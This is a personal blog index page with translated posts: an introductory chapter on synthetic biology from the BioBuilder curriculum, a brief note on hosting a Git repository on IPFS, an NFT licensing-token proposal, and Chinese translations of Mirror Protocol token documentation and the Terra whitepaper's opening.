Andrew's Blog

PURSUE ULTIMATE FACTS

2022-07-25
合成生物学基础

第1章 合成生物学基础

欢迎来到 BioBuilder 计划!我们很高兴您想将合成生物学工具带入您的课堂。在线,我们有多种材料帮助您入门,包括一些实用的实验室视频教程、Microsoft PowerPoint 幻灯片、课程指南和实验室工作表。在这本书面手册中,我们介绍了合成生物学的基本思想、在该领域和 BioBuilder 实验室中探索的生物学的一些关键方面,以及在 BioBuilder 程序中运行实验时使用的一些有用信息。在本章中,我们将介绍合成生物学的基本概念,解释它与传统生物化学和基因工程的不同之处,并开始探索一些基本的工程原理,这些原理将告知我们如何使用合成生物学解决问题。

什么是合成生物学?

在最基本的层面上,合成生物学家或生物建设者想要改造活细胞来做一些有用的事情。例如,治疗疾病、感知环境中的有毒化合物或生产有价值的药物。如图 1-1 所示,合成生物学家通过改变生物体的 DNA 来实现这些结果,使其行为“符合规范”,正如工程师所说的那样——基本上,它按照生物建造者的意愿行事。

FIGURE 1-1

图 1-1 合成生物学的目标。合成生物学旨在编写 DNA(左),指导细胞或有机体(右)按照设计规范行事。

我们可以将细胞视为复杂的微型工厂。DNA 提供指令以制造工厂中的所有机器——蛋白质、其他核酸、多组分大分子复合物等等。这些“机器”然后执行细胞的工作。有机体的天然 DNA 使细胞能够满足其基本的生存和繁殖需求。合成生物学家可以改变细胞的 DNA,使细胞具有新的有用功能(图 1-2)。我们将在本章后面更多地讨论研究人员如何改变生物体的 DNA。

FIGURE 1-2

图 1-2 当今的合成生物学。目前,合成生物学家通常会设计一部分 DNA(左)并将其与现有的细胞或有机体(中)结合,以便新的细胞或有机体(右)按照设计规范行事。

最终,合成生物学家希望能够使用设计的 DNA 从头开始构建专门的生物体。该领域还没有。目前,大多数努力都涉及对已经存在的生物体进行改造,而不是构建全新的生物体以新的方式行事。

为什么选择合成生物学?

合成生物学家所针对的许多挑战可以通过其他工程学科来解决,例如电气、化学或机械工程,但合成生物学的解决方案提供了一些独特的优势。最引人注目的是,细胞可以复制自己。汽车不能自我复制——你需要一个工厂来制造汽车。此外,即使营养很少,一些生物也可以非常迅速地复制自己。例如,在实验室中,大肠杆菌可以在大约 30 分钟内复制和分裂。因此,合成生物学是生产大量特定产品的一种有吸引力的方法,因为我们可以相对容易地培养程序化细胞以满足大规模生产的需求。单元还充当生产的物理工厂,提供其他工程解决方案应对相同挑战所需的大部分“实体”基础设施。最后,快速分裂单元的使用还有助于原型设计和测试,这对于设计周期非常重要,稍后我们将更详细地讨论。其次,细胞包含执行许多复杂任务的生物机制——例如特定的化学反应——否则即使不是不可能,也很难完成。而且,他们以纳米级的精度做到这一点,这在任何传统的制造设施中都难以复制。此外,当它们的纳米级机器发生故障时,细胞具有自我修复的机制,至少在一定程度上,这使它们比更典型的基于工厂的生产过程具有更大的优势。细胞复杂性也引入了需要考虑的障碍,但它的潜在效用是巨大的。第三,合成生物学具有为许多难题提供环保解决方案的潜力。必然地,合成生物学应用的副产品通常是无毒的,因为大多数有毒化合物会杀死正在工作的细胞。此外,利用天然细胞系统通常会产生经济的过程。今天的化合物工业生产消耗大量能源,通常会产生大量对环境有害的废物,并且经常需要高温或高压。超越它作为解决现实世界挑战的有用性,合成生物学也是了解更多自然系统运作的绝妙方法。随着研究人员剖析日益复杂的细胞功能,他们可以使用合成生物学从其他角度检验他们的假设。例如,如果他们的生化研究结果表明某种蛋白质充当一种开/关开关,他们可以通过用已知会表现出开/关行为的蛋白质替换现有蛋白质来测试这一结果。如果新的合成系统和天然系统的行为相似,则该结果提供了进一步的证据,表明天然蛋白质就像研究人员所怀疑的那样。你可能想知道:我们对细胞的了解是否足以可靠地设计它们,如果没有,我们真的应该尝试吗?有许多合成生物学特有的合理恐惧和担忧。诚然,诸如灯泡和电报之类的其他发明是在没有完全了解电物理的情况下设计的,但生命工程除了传统工程领域面临的挑战之外,还面临着额外的实践、道德和伦理挑战。例如,进化可以使经过精心编程的 DNA 发生突变,从而破坏细胞的工程功能。如果合成细胞以意想不到的方式与该生态系统中的现有生物相互作用,则在环境中复制合成细胞可能会造成危险。而且,当我们开始将细胞视为为执行我们的指令而建造的微型活机器时,合成生物学引发了一些哲学问题。任何要求我们重新考虑与自然世界互动的技术都必须谨慎处理。研究人员、生物伦理学家和政府组织正在积极讨论这些问题,并努力以负责任的方式开发合成生物学,从而改善生活世界。我们在生物伦理学基础章节中更深入地探讨了这些问题。我们仍处于这一发展学科的早期阶段。如前所述,合成生物学家还不能从零开始制造生物体。目前,它们主要在现有生物的框架内工作。此外,迄今为止的研究主要针对相对简单的单细胞生物,例如细菌(尤其是大肠杆菌)和酵母(S. cerevisiae),尽管在植物和哺乳动物细胞等更复杂的系统中也取得了一些早期成功。然而,随着该领域的发展,工程越来越复杂的系统将进一步扩大合成生物学的潜在应用和益处。

FIGURE

上下文中的合成生物学

合成生物学方法可能会让你想起基因工程,研究人员在基因工程中对生物体的基因组进行小规模的合理改变——例如从小鼠身上移除基因或将人类基因添加到果蝇中——以研究系统的行为。合成生物学家使用许多与基因工程师相同的工具,我们将在后面更详细地讨论,但合成生物学和基因工程在他们旨在做出这些改变的规模上有所不同。遗传工程师通常会引入一两个小的变化来研究特定系统,而合成生物学家的目标是设计新的基因组并大规模重新设计现有的基因组。合成生物学潜在规模的一个说明性(尽管是幻想)的例子是对一棵树的基因重新编程,以便它根据合成生物学家设计的基因指令长成一个功能齐全的房子。这样的系统将利用树木的自然程序(通过从环境中吸收一些养分来生长)并将其用于社会需求。然而,对一棵树进行基因编程以长成一所房子,目前远远超出了传统基因工程的规模以及合成生物学的能力。

FIGURE

为了完成如此大规模的设计目标,合成生物学家正在建立一个结构化的工程和设计学科,我们将在下一节介绍其原理。合成生物学家还利用生物化学家、分子生物学家和遗传学家多年来获得的有关生物系统如何工作的丰富知识。具体而言,科学研究产生了:

  • 合理表征的模型系统,例如大肠杆菌、酵母、藻类和各种类型的哺乳动物细胞培养物,为合成生物学探索提供了坚实的基础
  • 来自大量生物体的丰富序列数据,包括细菌、人类、蚊子、鸡、狮子、老鼠等等,以及用于序列比较和分析的工具
  • 移动、重新排序和合成 DNA 以创建新序列的分子工具

合成生物学家将这些发现和成功作为他们可以应用工程思维来解决现实世界问题的基础。合成生物学的跨学科性质是由图 1-3 建议。

FIGURE 1-3

图 1-3 合成生物学的跨学科性质。合成生物学家将分子生物学(左)的丰富知识和技术与工程原理(右)相结合,包括作为工程学科标志的设计-建造-测试周期。

工程与设计概论

工程师根据设计规范构建必须一致运行的复杂系统。为了实现他们的目标,工程师在设计、构建和测试阶段循环,通常对不同的设计进行快速原型设计,以找到最有希望的方向。这个过程类似于科学方法,研究人员通过假设、实验和分析循环。主要区别在于,科学方法旨在了解事物如何工作的精确细节,而工程方法不会关注设计工作的原因,只要原型测试成功即可。这些差异在“生物设计基础”一章中进行了更深入的讨论。在这里,我们介绍一个非常简单的例子来展示不同类型的工程师如何解决一个问题:给室内植物浇水。通过考虑不同的工程学科如何解决这个问题,我们将介绍一些设计基础,并说明合成生物学家如何应用类似的思维方式和方法。

“传统”工程解决方案

有些人天生就有绿拇指,但有些人需要一些额外的帮助;否则,他们的植物最终会看起来干瘪干瘪。不同类型的工程师会根据他们的专业知识以不同的方式解决这个植物浇水问题。例如,机械工程师可能会设计一个圆底重量不均匀的花盆。当底部的水箱装满水时,它会起到平衡的作用,使锅保持笔直。随着植物吸收水分,配重减少,花盆开始翻倒。这个视觉指示器将明显地提醒所有者植物需要水。也许倾斜的植物甚至可以打开水龙头给自己浇水。通过对系统进行工程反馈,当植物被浇水时,花盆会重新站立起来,从而形成一个闭环控制系统。

FIGURE

这种设计的一个潜在并发症是一些植物比其他植物需要更多的水,因此设计师可能需要在底部创建许多不同重量的不同花盆,园丁们需要确保为他们的植物购买正确的花盆.这些类型的考虑是设计过程中不可或缺的。没有设计是完美的,在考虑最佳实施方式时,了解任何提议设计的优势和局限性非常重要。

电气工程师可能会提出一种完全不同的浇水问题解决方案,其中涉及电子湿度传感器和自动浇水。她的系统可能由许多电子部件组成:电线、电阻器、电容器、湿度传感器、电路板等等。不同的部分可以协同工作来监控系统,确定植物何时需要水,然后在需要时提供水。

FIGURE

这种电气工程解决方案需要标准化,这是所有工程领域的一项重要原则,我们将在本章后面讨论这一原则。在这个植物浇水示例中,每个标准化的电子组件都由它可以执行的特定独立功能定义。这些组件的制造符合一系列行业标准。基本部件的这种标准化使得它们可以轻松可靠地相互连接,而不会影响它们的行为。这种标准化简化了设计,使工程师能够了解某个部件的行为方式以及它如何与其他部件结合以产生所需的结果。它还简化了制造,使工厂能够为数百万种不同的产品生产数百万个相同的电阻器。合成生物学尚未达到这种标准化水平,但正试图朝那个方向发展。

工程工具包

这两个针对植物浇水挑战的传统工程解决方案示例说明了如何使用多种设计来解决即使是相对简单的问题。这些方法在很大程度上受到每个工程学科中可用的“工具包”的支配和影响。一般来说,每种方法都来自一个工具包,其中包含几个不同的零件,例如需要组装在一起的螺母和螺栓,以及一些组装零件的方法,例如用于组装零件的锤子和螺丝刀。该工具包还包含指导每个领域的概念和想法。工具包的特定元素在不同学科之间往往有很大差异。例如,机械工程师的工具包包含具有多种属性的材料即金属、塑料和混凝土,以及操作材料的工具和方法,包括锯和焊机。重力是他们在设计中使用的概念的一个例子。另一方面,电气工程师拥有完全不同的工具包。他们的零件包括电线、电阻器、电容器和电路板,并且他们开发了自己的高度专业化的制造工艺来制造和组合这些零件。电气工程理念进一步利用了对电信号的现代理解。为了使合成生物学成为一门成熟的工程学科,合成生物学家必须定义他们的工具包。与机械工程和电气工程一样,这些工具将包括需要组装在一起的零件以及组装它们的方法;当然,这些部分和方法将特定于生物学。合成生物学工具包中的许多工具都源自分子生物学。在下一节中,我们将介绍这些先前存在的工具包的一些组件,并探讨它们是如何在合成生物学工具包中实现的。

合成生物学工具包

为了探索合成生物学工具包,让我们首先考虑生物学家如何应对植物浇水挑战。从广义上讲,他们会使用基因工具来改变植物本身。这种方法可以采取许多不同的形式。例如,一种解决方案可能使用在变色龙中发现的一种基因,该基因负责根据压力改变颜色。这个基因有可能被插入到植物中;因此,它们可以改变颜色以在需要水时提醒我们。这种方法类似于机械工程师添加视觉指示器(锅翻倒)以帮助所有者记住植物何时需要水的方法。也可能有一种更类似于电气工程解决方案的生物解决方案,它使工厂的所有者完全无需提供水。如果有可能从仙人掌植物中分离出一两个基因——或者甚至更古怪的是,从骆驼中分离出一两个基因,以帮助这些生物体在沙漠栖息地承受非常低的水供应?插入植物中的这些基因也可能帮助它们在很少的水的情况下生存。这两种解决方案都可以用今天的分子生物学工具来解决,但是这些类型的小修改不符合合成生物学家的目标,即大规模基因组操作的目标,而这对于诸如从种子。这种批发基因组设计需要一个完整的工程工具包。这样的工具包必须从分子生物学和基因工程的既定领域的贡献开始并建立在这些贡献之上。

分子生物学工具包

分子生物学家多年来一直在开发以不同方式操纵 DNA 的方法。以下是在合成生物学中广泛使用的三种最关键和最成熟的技术:

  • 读取 DNA 代码
  • 复制现有的DNA序列
  • 将特定的 DNA 序列插入现有的 DNA 链中

这些技术经过多年的分子生物学研究已经成熟,研究人员继续开发新技术来改进这些过程。 Frederick Sanger 博士和 Walter Gilbert 博士于 1977 年使用链终止化学开发了强大的 DNA 测序技术,这使得准确确定长 DNA 链中 Gs、As、Ts 和 Cs 的模式成为可能。 1983 年,当 Kary Mullis 博士开发了聚合酶链式反应 (PCR) 时,实验室中现有 DNA 序列的常规复制开始了。 PCR 是一种强大的方法,它使用细胞蛋白质复制 DNA 和研究人员提供的遗传模板来合成大量特定的 DNA 序列。最后,Paul Berg 博士、Stanley Cohen 博士和 Herbert Boyer 博士在 1970 年代开发了重组 DNA (rDNA) 技术,研究人员可以利用该技术轻松而精确地结合来自不同来源的 DNA 序列,包括不同的生物体,主要基于各种天然存在的蛋白质称为限制性内切酶,可在特定序列切割 DNA。这些方法的灵感来自并使用了自然发生的细胞过程的工具。表 1-1 说明了这些相似之处。

表 1-1 分子生物学工具包及其自然起源

工具 分子生物学技术 自然细胞过程
读取 DNA 测序 DNA 复制
复制 DNA PCR DNA 复制
插入 DNA rDNA 与限制性内切酶和连接酶 防御感染、DNA 重组和修复

分子生物学

DNA 复制是一种自然发生的细胞过程,它从现有的 DNA 模板中产生新的 DNA 序列,通常是为了产生新的遗传物质,以便细胞可以分裂。这个过程因人而异在不同的物种中,可能需要许多蛋白质来解开 DNA 并启动复制,但关键要求如下:

DNA聚合酶

将核苷酸添加到生长链中的酶。

DNA引物

这是一条已经合成的 DNA 短链,与要复制的序列的开头结合(DNA 聚合酶只能将新碱基添加到现有链上)。

游离核苷酸碱基

游离的 A、T、C 和 G 核苷酸,统称为 dNTP,可在细胞中添加到生长链中。

Sanger测序是一种确定DNA片段序列的实验室技术。研究人员将他们想要测序的 DNA 与 DNA 引物、DNA 聚合酶和 dNTP 混合以开始复制。混合物中还添加了少量修饰的碱基,一旦掺入就会停止链伸长。这些修饰的碱基也被标记,通常带有放射性或荧光,每个碱基都有一个独特的标签。中断复制过程产生的片段可以根据大小进行排序,并根据每个片段末端修饰碱基上的标签读取序列。

PCR 是一种实验室技术,用于创建现有 DNA 片段的多个副本。这个过程模拟了自然的 DNA 复制。研究人员将所需的 DNA(称为“模板”)、指定复制开始和结束位置的引物、DNA 聚合酶和 dNTP 结合起来。然后将混合物循环通过促进不同步骤的不同温度。首先,将混合物加热至高温,使所有 DNA 碱基不成对。然后降低温度,使引物与模板 DNA 结合。最后,稍微升高温度以使 DNA 聚合酶发挥作用。该过程重复多次以创建所需 DNA 片段的许多副本。

限制性酶是稀有的天然存在的酶,也可用于实验室,可在特定碱基序列处切割 DNA,以产生钝端或“粘性”末端;也就是说,在双链 DNA 末端有几个未配对的碱基。当具有互补粘性末端的 DNA 片段结合在一起时,它们会相互结合,形成一个新的序列,如图 1-4 所示。

FIGURE 1-4

图 1-4 用限制性内切酶切割的 DNA。黑色和蓝色条对代表双链 DNA,颜色编码以显示它已被限制性内切酶切割以留下互补的“粘性末端”(左)或“平末端”(右),可以重新连接,如图所示。

质粒是一种小的圆形 DNA 片段,最常见于细菌中,独立于染色体 DNA 持续存在于细胞中。它们在分子生物学中用于将设计的遗传系统转移到感兴趣的细胞中。当用于此目的时,它们通常被称为“向量”。

为合成生物学扩展的工具包

尽管这些方法已经存在很多年并且在研究中得到了很好的应用,但它们对于合成生物学来说还不够。例如,它们可能足以将变色龙的基因插入植物中,但它们无法使植物可靠地重新编程以长成两居室、两间浴室的房子。因此,我们使用术语基因工程而不是合成生物学来指代宿主生物体中相对小规模的基因操作,可能最多改变少数几个基因。

另一方面,合成生物学渴望编写和重写整个基因程序以创造有用的功能和产品。为了实现这些更雄心勃勃的工程目标,合成生物学家将他们的工具包扩展到传统基因工程之外,还包括来自更成熟的工程学科的设计原则。他们会经常借鉴工程语言,这为思考设计提供了有用的框架。

FIGURE

这些额外的工具在很大程度上仍处于开发阶段,包括:标准化、抽象化和从头 DNA 合成。标准化和抽象都直接来自其他工程学科的工具包,而 DNA 合成是合成生物学独有的工程工具。稍后我们将更详细地描述这些主题,但以下是简要定义:

DNA合成

这是一种在没有预先存在的物理模板的情况下化学生产 DNA 链的过程,在合成生物学中的使用范围比分子生物学所需的要广泛得多。

标准化

这种方法旨在生成一组组件,这些组件可能在多个系统中有用,并且可以针对不同的结果进行重新组合。

抽象

这是构建复杂系统时管理详细信息的工具。有了它,设计人员可以“完成工作”,而无需牢记系统的每个细节是如何工作的。在实践中,工程师使用不同的级别抽象取决于它们在设计-构建-测试周期中的位置。

DNA合成

DNA 可以通过一系列简单的化学步骤产生,这些步骤与将一个构建块添加到另一个构建块的任何一组化学反应没有根本不同。在 DNA 的情况下,这些构件是核苷酸,但由构件制成的聚合物的其他例子包括由氨基酸制成的蛋白质和由乙烯单体制成的聚乙烯。在细胞中,DNA 是使用大分子复合物合成的,这些复合物将每个后续核苷酸添加到现有的 DNA 链中。在实验室中,化学家已经开发出替代方法,通过将核苷酸化学附加到不断增长的核苷酸链上来生产 DNA。无论是在细胞中还是在实验室中制造,合成的 DNA 都必须具有正确的序列。在细胞中,DNA 序列基于提供序列信息的现有模板链。另一方面,合成生物学家经常设计不存在模板的新序列。当没有模板链可跟随时,它们通过使用数字序列信息确定合成 DNA 的核苷酸顺序。借助这项技术,合成生物学家可以编写以前从未编写过的新 DNA 序列。

FIGURE

通过这种方法可以产生的 DNA 链的长度存在一些限制,但最近 Craig Venter 博士及其同事合成了一个完整的功能基因组达到了一个里程碑。这一成就同时证明了化学 DNA 合成作为合成生物学工具包的核心组成部分的潜力,并引发了对其使用的伦理担忧。研究人员使用化学合成重建了蕈状支原体细菌的基因组,以生成多个短 DNA 片段。他们在序列中添加了一些他们称之为“水印”的小变异,然后将这种合成的 DNA 插入到微生物(面包酵母)中,并在那里组装成完整的基因组。最后,他们将基因组移植到山羊分枝杆菌中,替换了该细菌现有的基因组,基本上将山羊分枝杆菌的外壳转化为蕈状分枝杆菌。这一进展听起来很像玛丽雪莱著名小说作品中的弗兰肯斯坦怪物,刺激了总统生物伦理问题研究委员会,并导致了一份报告,新方向:合成生物学和新兴技术的伦理,该报告涉及与合成生物学和成熟的 DNA 合成技术相关的潜在伦理问题。

标准化

标准化是任何工程学科的重要组成部分,因为它有助于设计人员能够重用零件、与其他团队合作并高效工作。对于电气工程,这种标准化意味着设计人员可以相对容易地将各个部件连接在一起,以便他们可以相互“交谈”。对于合成生物学家来说,标准化使 DNA 片段能够在物理和功能上相互连接。组装的物理标准使所有 DNA 部件都可以通过通用策略连接到其他部件。这类似于机械工程师可以将任何螺母连接到任何螺栓的方式,因为这些部件都使用标准尺寸的螺纹。细胞环境和生物系统的复杂性使标准组合变得困难。尽管如此,人们仍在努力定义 DNA 组装的标准,以便合成生物学家拥有一组可靠的部件,并在他们想要使用它们进行构建时找到标准化的遗传元件,如启动子或阻遏物。 DNA 部分的物理标准化在 DNA 工程基础章节中有更详细的讨论。但是,成功地将各个部分组合在一起并不能保证它们会按预期工作或可以互换。另一个考虑因素是功能标准化,这意味着无论在什么情况下,遗传部分都将可靠地编码特定行为。合成生物学中实现这一可预测功能目标的一种方法是用数字术语表征细胞的行为:一段 DNA 要么“开启”(即由细胞表达),要么“关闭”(未表达)。我们生活中的所有电子产品都熟悉这种数字原理。我们的电视和手机要么开着(即使它们正在“睡觉”),要么关着。这种全有或全无的行为使得连接不同的部分变得相对容易。当电视接收到遥控器的输入以打开时,它会激活并提供视频和音频输出。同样的原理也适用于构成电路的组件:每个组件都接收输入,“开”或“关”,这决定了它的输出,“开”或“关”。这是对电路的高度简化的描述,但由于“开”和“关”状态是跨部件标准化的,电气工程师可以连接部件并预测e 电路的行为。合成生物学家也在尝试开发类似的“数字标准”,将基因或酶描述为“开启”或“关闭”。当然,大多数生物行为(如转录或酶活性)并不是完全数字化的,但只要我们小心,这个类比就足够了。使用这种方法,我们可以使用其他电气工程模式,例如接线图和真值表,来帮助我们设计系统。这些工具在“生物设计基础”一章中有更详细的描述。

iGEM

国际基因工程机器 (iGEM) 竞赛将标准化概念应用于 DNA 部分。这场比赛汇集了来自世界各地的大学生和高中生来回答这个问题:“简单的生物系统能否由标准的、可互换的部件构建并在活细胞中运行?”第一场比赛于 2004 年举行,起初只有五所学校和少数学生,但到 2014 年,比赛共有来自 34 个国家的 295 支队伍参赛。每个 iGEM 团队都面临着使用 iGEM 标准生物部件注册表中的标准化部件设计和构建新生物系统的挑战。这些部件具有标准化的连接点,允许它们通过一致且可重复使用的装配方案进行物理连接。团队只能使用四种限制性内切酶和标准化 DNA 部分的 iGEM 库来组装遗传电路并进行更复杂的遗传元素排列。标准生物部件的重复使用是来自不同学校的团队可以共享试剂并加速每个人在他们的夏季项目中取得进展的一种方式。我们在 BioBuilder 计划中进一步探索了几个 iGEM 项目,一个涉及气味,一个涉及颜色。

抽象

通过抽象,合成生物学家可以设计复杂的部件、设备和系统,而不必担心它们如何工作的每一个细节。相反,重点是最终目标,即最终的系统输出或行为。在实践中,任何新系统的设计都会非常自然地使用抽象级别。在设计过程的开始,我们经常会广泛地考虑可能的解决方案,而很少担心它们的实现细节。随着问题和解决方案被分解成更小的部分并变得更加明确,一些早期的抽象变得具体,以便我们可以实际构建和测试设计的系统。抽象对于合成生物学尤其重要,因为细胞环境和细胞过程非常复杂。如果我们试图了解每一个新设计的每一个细节,我们将不得不缓慢地通过我们的想法。相反,我们可以将细菌细胞视为“黑匣子”(见图 1-5)。换句话说,我们不需要纠结于细胞内每条通路的细节,尤其是在开发初始设计时。

FIGURE 1-5

图 1-5 将单元格视为黑盒。合成生物学是通过抽象实现的,它允许在不考虑细胞内每条通路的所有细节的情况下对细胞进行工程改造。

图 1-6 展示了抽象的层次结构。最高抽象层是系统,即我们的蜂窝黑匣子。在该系统中,我们可能对开发具有特定功能的设备感兴趣,例如感应环境化学物质并产生特定的输出气味作为响应。当我们决定我们希望我们的设备如何工作时,我们可以开始考虑创建每个设备所需的不同部分;例如,一种感知环境化学物质的方法以及一种控制气味输出的反应方法。最后,在抽象层次结构的最低级别——根本不是抽象的——是我们手头需要作为部分使用的实际基因序列。通过将设计过程分解为这些不同的抽象层,我们将问题分成可以更有效地解决的小块。我们将详细介绍这些抽象级别中的每一个,并在“生物设计基础”一章中提供如何在设计过程中实现它们的具体示例。

FIGURE 1-6

图 1-6 抽象层次结构。抽象可以支持复杂的系统设计。这种抽象层次是可用于合成生物学的众多层次之一。这里的最高抽象级别是整个系统,然后可以将其分解为由某些部分组成的特定设备。这里最细粒度的抽象级别描述了实现设计所需的 DNA 序列。

包起来

FIGURE

在本章中,我们专注于合成生物学的力量,以产生可以提供有用产品或服务的新系统。我们介绍了合成生物学的基本概念,解释了该领域与传统生物化学和分子生物学的不同之处,以及一些来自已建立工程领域的基本原则为合成生物学家设计和构建活生物技术的方式提供了依据。合成生物学所支持的工程和设计方法也具有更广泛的意义。正如物理学家理查德·费曼所说:“我不能创造的东西,我不明白。”尽管我们在理解生物系统方面确实取得了长足的进步,但我们还不能建立全新的系统。即使是最基本的生物过程和系统,仍有很多东西需要学习,合成生物学也为这项工作提供了一个强大的新工具。

额外阅读和资源

Read More

2022-03-19
Git-style Repository on IPFS

Host a Git-style repo

In [ ]:
cd ~ && git clone --bare https://github.com/seii-saintway/demo-ga
In [ ]:
cd ~/demo-ga && git update-server-info
In [ ]:
git unpack-objects < objects/pack/*.pack
In [ ]:
rm -f objects/pack/*

Decentralized Version Control System

Read More

2022-03-10
CQLT: Exploring a New Way to Tokenize Academic Publishing

复制引用许可代币:探索学术论文发表的代币化新方法

我们需要作为 NFT 复制引用许可证明的 ERC-1155 代币 CQLT。对这种复制引用许可币 CQLT 本身的需求是从 NFT 版权证明的需求中衍生而来的。它的发行由 NFT 所有者完全控制。它的精度为个位数,总量为人类人口数量,或者限量,或者不限总量。拥有一个这种复制引用许可币的人就拥有对于 NFT 进行一次复制引用的权利。NFT 作为异质代币,具有唯一性,流动性差,只在收藏品拍卖市场进行交易。

We need the ERC-1155 Copy and Quote License Token (CQLT) as a proof of NFT Copy and Quote License. The need for CQLTs is derived from the need for proof of copyright in NFTs. Its issuance is fully controlled by the NFT owner. Its precision is a single digit, and the total supply is either limited or unlimited, and can be as large as the human population. The person who owns one such CQLT has the right to copy and quote the NFT once. As a Non-Fungible Token, NFT is unique and has poor liquidity, and is only traded in the collectible auction market.

Read More

2022-03-06
Mirror Token

Mirror Token (MIR)

原文:https://docs.mirror.finance/protocol/mirror-token-mir

镜像代币MIR)是镜像协议的治理代币。目前,它必须被质押才能对活跃的提案进行投票,并且需要作为押金才能进行新的治理提案。在 Mirror 的未来迭代中,它将为协议提供进一步的用途,增加其效用和价值。

持有 MIR 代币的用户还可以通过从协议中的 CDP 头寸提取抵押品获得 MIR 奖励。

MIR 还用于激励用户通过质押 LP 代币来获得收益,这些 LP 代币是通过为 MIR 和 mAssets 提供流动性而铸造的。通过年度通胀所新铸造的 MIR 用来向用户支付收益,这会逐渐增加 MIR 的总供应量,直到第 4 年年底。

镜像代币供应

计划在 4 年内分发总共 370,575,000 个 MIR 代币。除此之外,不会再有新的 MIR 代币被引入供应。

累积分配时间表(以百万计)

创世纪 Y1 Y2 Y3 Y4
UNI空投 9.15 9.15 9.15 9.15 9.15
Luna 质押空投 9.15 9.15 9.15 9.15 9.15
Luna 质押奖励 0 18.3 18.3 18.3 18.3
mAsset LP 质押 0 89.2125 133.81875 156.121875 167.2734375
MIR LP 质押 0 20.5875 30.88125 36.028125 38.6015625
社区池 36.6 36.6 54.9 91.5 128.1
代币总供应 54.90 183.00 256.20 320.25 370.575
年通货膨胀率 (%) - 233.33% 40.00% 25.00% 15.71%

Genesis Token Distribution

镜像协议创世时共有 54.9M 个代币可用。这些代币的分配方式如下:

  • UNI 空投:16.66%(9.15M)代币将空投给 UNI 持有者。
  • LUNA 质押者空投:16.66%(9.15M)代币将空投给 LUNA 质押者。
  • 社区池:66.66% (36.6M) 代币将分配给社区池。

Final Token Distribution

由于通货膨胀,MIR 代币的总供应量将增加 4 年,直到总代币供应量达到 370.575M

第 4 年末的分配结构如下所示:

  • 空投:最初分配给 UNI 持有者和 LUNA 质押者的空投数量现在将占代币总供应量的 4.9%(18.3M)。
  • LUNA 质押奖励:4.9%(18.3M)将在镜像协议启动后的第一年分配给 LUNA 质押者。 MIR 将仅在第一年每 100,000 个区块(大约每周一次)分发给 Luna 质押者,从区块高度 920,000 开始。将每 100,000 个区块拍摄一次快照,以确定谁有资格获得质押奖励分配。
  • mAsset LP Staking:到第 4 年年底,45.1% (167.27M) 代币将分配给所有 mAsset 和 mAsset (mETH) 质押池。代币每天分配给每个质押池(最初每个 Mirror 和 mETH 13 对),基于与其他资产相比,它们的权重
  • MIR LP Staking:到第 4 年底,10.4% (38.6M) 代币平均分配到 MIR-UST 和 MIR-UST (mETH) 质押池。MIR-UST 对的初始权重为 300,大于权重 mAsset 数量(第一批 mAsset 有 100 个,列入白名单的 mAsset 有 30 个权重)。
  • 社区池:到第 4 年年底,将有 34.6%(128.1M)的 MIR 总供应量分配给社区池。

分配率(通货膨胀)

MIR 代币的通货膨胀率被设计为每年逐渐下降,直到在第 4 年年底达到 370.575M。在第 4 年结束后,将不再通过通货膨胀铸造 MIR 代币。

MIR 质押奖励

本节讨论 MIR 代币的质押奖励,这些奖励来自用于从市场回购 MIR 的交易费用。质押 LP 和 sLP 代币也会产生 MIR 奖励,这些奖励直接来自每个区块创建的新 MIR 代币。点击此处了解详情。

来自协议费用

MIR 代币质押者在每个区块收到 MIR 代币奖励,协议费用是从 CDP 提款产生的。协议费用从 CDP 抵押品中收取,并在发送到 Collector 合约后出售给 TerraUSD,以通过 Terraswap 购买 MIR。然后将 MIR 代币作为奖励分配给 MIR 质押者和选民,并按总股份的百分比进行分配。这个过程通过产生购买压力来平衡新 MIR 的产生。

来自提案创建费

每当创建新的治理提案时,都必须支付 MIR 代币的初始押金。如果投票未达到投票法定人数,则该押金将按比例分配给所有 MIR 质押者。

来自投票奖励

根据尚未达到投票法定人数的投票产生的协议费用和投票创建费用,voter_weight 用于确定在正在进行的投票中投票的用户之间分配的 MIR 代币数量。如果包括质押和投票奖励的总 MIR 治理奖励是 $R_{total}$ 是,

$$R_{passive}+R_{vote}$$

这里 $R_{passive}$ 是未投票的 MIR 质押者的奖励,并且 $R_{vote}$ 是对正在进行的提案已经投票了的用户的奖励。如果 voter_weight 是 $W_{vote}$, 并且对于第 $i$ 个提案,个人和全体所投的 MIR 是 $m_{\text{i}}$ 和 $M_{\text{i}}$,投票奖励 $R_{\text{vote}}$ 是,

$$\sum_{i=1}^n \frac{m_{\text{i}}}{M_{\text{i}}} \frac{W_{\text{vote}}R_{\text{gov}}}{n}$$

年利率计算

注意由于大多数 mAssets 的协议费用仅在其基础现实世界资产的交易时间内产生,因此在周末和节假日分配的实际奖励会低得多。

Mirror Web App 显示 MIR 质押奖励的年度百分比率。由于协议费用的波动性,MIR 质押 APR 计算使用过去 15 天每天的平均奖励

如果第 $i$ 天给 MIR 质押者的奖励为 $r_i$,总 MIR 质押量为 $M$,MIR 质押(365 天)的年化百分比为,

$${\sum_{i=1}^{15}{m_i} \over M} \times 365$$

其中应用了最近 15 天的奖励分配信息。此 APR 是在假设用户已对所有正在进行的治理提案进行投票的假设下计算的。

Read More

2022-03-04
Terra 白皮书

Terra Money:稳定性和采用

Evan Kereiakes、Do Kwon、Marco Di Maggio、Nicholas Platias

2019 年 4 月

原文:Terra Whitepaper

摘要

虽然许多人看到价格稳定的加密货币结合了法定货币和比特币的优点,但没有多少人有明确的计划采用这种货币。由于货币作为交换媒介的价值主要受其网络效应驱动,因此成功的新数字货币需要最大限度地采用才能发挥作用。我们提出了一种加密货币 Terra,它既价格稳定又受增长驱动。它通过稳定的挖矿激励措施实现弹性货币供应,实现价格稳定。它还使用其挖矿业务产生的铸币税作为交易激励,从而促进采用。法币经济和区块链经济都需要去中心化、价格稳定的货币协议。如果这样的协议成功,那么它将作为加密货币的最佳用例产生重大影响。

1 引言

加密货币的价格波动性是学术界和市场观察者研究得很透彻的问题(例如,参见 Liu 和 Tsyvinski,2018 年,Makarov 和 Schoar,2018 年)。大多数加密货币,包括比特币,都有预定的发行时间表,加上强烈的投机需求,导致价格剧烈波动。比特币的极端价格波动是其作为交换或价值储存媒介被采用的主要障碍。直观地说,没有人愿意用一种可能在几天内价值翻倍的货币进行支付,也没有人愿意用在交易结算之前其价值可能会大幅下降的货币进行支付。当交易需要更多时间时,问题会更加严重,例如对于抵押贷款或雇佣合同等延期付款,波动性会严重损害合同的一方,使得在这些环境中使用现有数字货币的成本高得令人望而却步。

